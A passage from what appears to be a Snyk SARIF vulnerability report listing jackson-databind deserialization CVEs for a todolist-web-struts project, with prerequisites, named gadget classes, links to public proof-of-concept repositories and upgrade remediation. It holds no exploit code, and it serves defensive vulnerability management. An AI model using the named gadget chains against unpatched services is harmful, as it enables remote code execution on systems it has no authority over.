are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb)\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2460)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-17531) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed 
paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. 
Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1 or higher.\n# References\n- [Blog Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2498)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-20330) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data 
Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Two additional `net.sf.ehcache` gadgets are not blacklisted.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.2 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2526)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-8840) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: 
io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt lacks `xbean-reflect/JNDI` blocking, as demonstrated by `org.apache.xbean.propertyeditor.JndiConverter`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. 
The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.5, 2.9.10.3 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2620)\n- [Jackson PoC](https://github.com/jas502n/jackson-CVE-2020-8840)\n- [PoC](https://github.com/jas502n/CVE-2020-8840)\n- [PoC](https://github.com/Veraxy01/CVE-2020-8840)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-9546,CVE-2020-9547,CVE-2020-9548) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library 
which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Mishandles the interaction between serialization gadgets and typing, related to:\r\n\r\n* `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)\r\n* `br.com.anteros.dbcp.AnterosDBCPConfig` (aka `anteros-core`)\r\n* `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` (aka shaded `hikari-config`)\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2)\n- [Github Issue #1](https://github.com/FasterXML/jackson-databind/issues/2634)\n- [GitHub Issue #2](https://github.com/FasterXML/jackson-databind/issues/2631)\n- [GitHub PoC](https://github.com/fairyming/CVE-2020-9548)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", + "shortDescription": { + "text": "High severity 
- Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2019-14892,CVE-2019-14893) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt doesn't block `common-configuration` JNDI classes `org.apache.commons.configuration.JNDIConfiguration` and `org.apache.commons.configuration2.JNDIConfiguration`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.8.11.5, 2.9.10.3 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2462)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2469)\n- [RedHat Bugzilla](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-10673) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding 
functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.caucho.config.types.ResourceRef` (aka `caucho-quercus`).\r\n\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n# References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2660)\n- [On Jackson CVE's Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-10673)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", + "shortDescription": 
{ + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-10672) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory` (aka `aries.transaction.jms`). \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n# References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2659)\n- [On Jackson CVEs: Don’t Panic](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-10969) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and 
tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `javax.swing.JEditorPane`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
